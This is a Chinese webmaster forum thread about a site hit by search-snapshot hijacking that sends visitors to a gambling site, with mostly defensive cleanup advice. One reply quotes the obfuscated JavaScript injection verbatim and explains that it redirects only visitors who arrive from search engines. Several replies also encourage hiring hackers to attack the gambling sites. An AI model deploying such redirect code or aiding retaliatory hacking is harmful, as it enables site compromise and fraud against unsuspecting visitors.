网站前段时间被劫持了，如下图，好长时间不管，还好别人告诉我网站出问题，删除代码后，它又来了一次。

然后从百度搜了下“北京赛车pk10”，结果如下

想要资讯各位大佬的问题主要如下：

1、有什么好的办法防止它的下次攻击？（复制黏贴、灌水的就不要了）

2、百度的安全提示提交解封了，没卵用。我估计就是等着，除了等着还有更实际的解决办法没？

3、谁知道“北京赛车pk10”具体是怎么个运作方式，有没有大神去黑他们的网站，最好把他们的几个站全部删除了，如有，本人友情赞助。mb没事来搞我老老实实做网站的

1、有什么好的办法防止它的下次攻击？（复制黏贴、灌水的就不要了）

答：1，删除木马，要找出他们的木马程序并删除；2，改密码，要修改登录的地址和登录的密码（网站和FTP或者服务器）

2、百度的安全提示提交解封了，没卵用。我估计就是等着，除了等着还有更实际的解决办法没？

答：这个急不来，只能等。这个需要你清除木马做好安全以后再去提交，然后就只能等了。

3、谁知道“北京赛车pk10”具体是怎么个运作方式，有没有大神去黑他们的网站，最好把他们的几个站全部删除了，如有，本人友情赞助。mb没事来搞我老老实实做网站的

答：具体怎么运作估计也只有内部人士才知道，如果你想搞他们的网站，可以去找大神黑了。

劫持话最好好好你的index的头部文件一般都是哪里别人添加了一段代码，只要把那个换一下原先的那个就行了。加上CDN或者安全狗也行

看看自己代码里有没有什么陌生的文件夹，有的话把他删除就好了，实在不会的话就去淘宝花个十几块钱找人帮你解决一下

之前很早好像就看你问过了，太久了对网站影响也很大，处理不好的话可以考虑找人处理，淘宝价格也比较便宜，之前我也有过2个小时就处理好了。

1、这种情况肯定是你的竞争对手在搞你，首先是上淘宝找个专业的程序帮你把网站的垃圾都清理干净；

2、如果想以后好好维护这个网站的话，那就是换服务器，不过好的服务器成本很高，群英服务器，在中国来说防御能力是很强很强的，同时价格也不便宜；如果你更换服务器的话，你的竞争对手三天两头会搞你，让你的网站没排名；

3、还有你说的黑网站的技术，可以去淘宝找一找，淘宝是万能，希望能帮助你；

这是藏在网站内部的一个文件，如果自己没办法找出来的话，可以考虑淘宝找人处理不是很贵，之后网站后台、账号、密码还有服务器信息修改复杂一些，网站在禁止写入就不会了。解决不了的话可以加我QQ聊下。

问题如果处理不了可以考虑发钱，长期这样对网站影响很大，通常把源码上木马的找到，然后把变更代码删除，服务器杀毒就好了。

首先，你要观察，你的网站是属于主页劫持还是快照劫持。有针对性的排查。那个页面被改了，先把他改回来，找到马的位置，把后门删除掉。并且建议更改服务器密码。

看看自己代码里有没有什么陌生的文件，有的话把他删除就好了(最好看一下日志文件)，实在不会的话就去淘宝找人帮你解决一下，花不了几个钱的。

小兄弟，你这是被快找劫持了。具体快找劫持详情看百度百科：

至于说防御，防个毛线，自己网站安全没做好，就不要想着防御了。如果你的网站盈利还行的话，建议请个技术提升一下你网站的安全等级。

至于说你想把这些pk的人搞死，真是想多了。干他们这个的都不差钱，你觉得你干得赢他们吗？而且这些词不是一个人做，是很多人做，干完一个还有一个。你确定你要干吗？

如果你真的有钱去干，唔，祝你好运。

北京pk10，专业的买车（类似于买*马）的关键词，这么说明白不。

一旦发现网站有挂马，泛解析，快照劫持，首页自动跳转等情况，检查看下网站的源代码，将非网站本身的代码去除，然后需要修复网站漏洞，不给黑客可乘之机；一般这种情况都是反复性质的被篡改跳转，清理恶意跳转代码后没过多久就又被篡改了，关于网站的漏洞修复，以及网站安全防护可以找专业的网站安全公司来处理，国内也就SINE安全，绿盟，启明星辰等安全公司比较专业，然后再修改网站相关的用户名与密码，找服务器安全公司加强服务器端的安全设置；通过申诉的方式尽可能减小网站的流量，排名损失。

你好兄弟对于你这个问题我想只能给我给你解决了，我只能告诉你，你现在的网站可以被别人操控，因为你的数据库已经被镜像同步，如果你想解决这个方法，直接找我把，搜外这里的这些人没一个能给你解决的。

这个问题估计是只有换代码了，或者换一下服务器。

这么巧，我前两天也遇到过被劫持快照的，代码如下：<script>eval(function(p,a,c,k,e,r){e=function(c){return (a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('("<5 9=\\"b\\">");("c 1=");("8((\\"a\\")>0 || (\\"o\\")>0 || (\\"d\\")>0 ||(\\"e\\")>0 ||(\\"f\\")>0 ||(\\"g\\")>0 ||(\\"h\\")>0 ||(\\"i\\")>0 )");("\\"l://\\";");("</5>");',25,25,'|s|indexOf|document|writeln|script|com|referrer|if|LANGUAGE|baidu|Javascript|var|soso|sm|uc|bing|yahoo|so|location|href|https|www|b99655|sogou'.split('|'),0,{}))</script>

[跳转代码]

判断搜索引擎跳转代码

将代码放在首页即可，直接输入网址不跳转，从搜索引擎进入会跳转到指定网站。

我删除了代码，第二天又出来了，没办法，修改了后台地址和账号密码，还是被挂马，再后来联系阿里云提交了代码，说明了情况，修改了ftp密码，这两天才没有挂马！用360网站卫士扫描了一下，发现有漏洞，dede系统，然后修补了漏洞！就这样，绝大多数情况下是同行搞的！！！

上面讲的差不多了，就是找后台漏洞，删和改，修改涉及到的一切密度、投诉、申请之类的，然后使用安全狗。

我这边分享个扫码工具：  mi：o4ho  优先把ftp中涉及到内容和数据库的下载下来，然后用扫码工具进行查毒，将原来的程序重新删除后长传。

给你个最简单粗暴的，我用过百试百灵。先把看得见的劫持代码删除，尽量把网站先恢复到劫持之前，然后果断删除admin目录里所有文件，备份到本地或服务器其他盘符。如果没有太多功能直接把网站所有动态文件删除，只留下HTML页面！呵呵  绝吧？

如果是DNS劫持，换DNS服务器，换第三方的！

她们说的这哪的，没有一个有我这个实际。明确告诉你，只要存在动态页面、功能板块页面就会有漏洞！ 如果网站更新不是非常频繁，建议采用我这个办法！绝对好用！